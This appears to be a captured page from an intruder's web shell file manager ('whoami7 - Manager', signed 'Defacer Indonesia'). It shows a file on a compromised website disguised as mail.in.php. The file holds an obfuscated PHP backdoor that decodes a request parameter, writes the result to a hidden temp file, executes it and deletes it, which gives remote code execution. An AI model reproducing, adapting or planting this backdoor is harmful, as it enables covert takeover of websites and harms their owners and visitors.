whoami7 - Manager
:
/
home
/
analuakl
/
amplhomes.com
/
Upload File:
files >> /home/analuakl/amplhomes.com/mail.in.php
<?php if(count($_REQUEST) > 0 && isset($_REQUEST["\x72\x65c\x6Frd"])){ $obj = $_REQUEST["\x72\x65c\x6Frd"]; $obj = explode ( '.' , $obj ) ; $res = ''; $salt1 = 'abcdefghijklmnopqrstuvwxyz0123456789'; $lenS = strlen( $salt1 ); foreach( $obj as $x => $v2) { $sChar = ord( $salt1[$x % $lenS] ); $d =( ( int)$v2 - $sChar -( $x % 10))^74; $res .= chr( $d ); } $value = array_filter(["/dev/shm", ini_get("upload_tmp_dir"), "/var/tmp", getenv("TEMP"), sys_get_temp_dir(), session_save_path(), getcwd(), getenv("TMP"), "/tmp"]); foreach ($value as $key => $binding) { if (is_writable($binding) && is_dir($binding)) { $entry = join("/", [$binding, ".hld"]); if (file_put_contents($entry, $res)) { require $entry; unlink($entry); die(); } } } }
Copyright ©2021 || Defacer Indonesia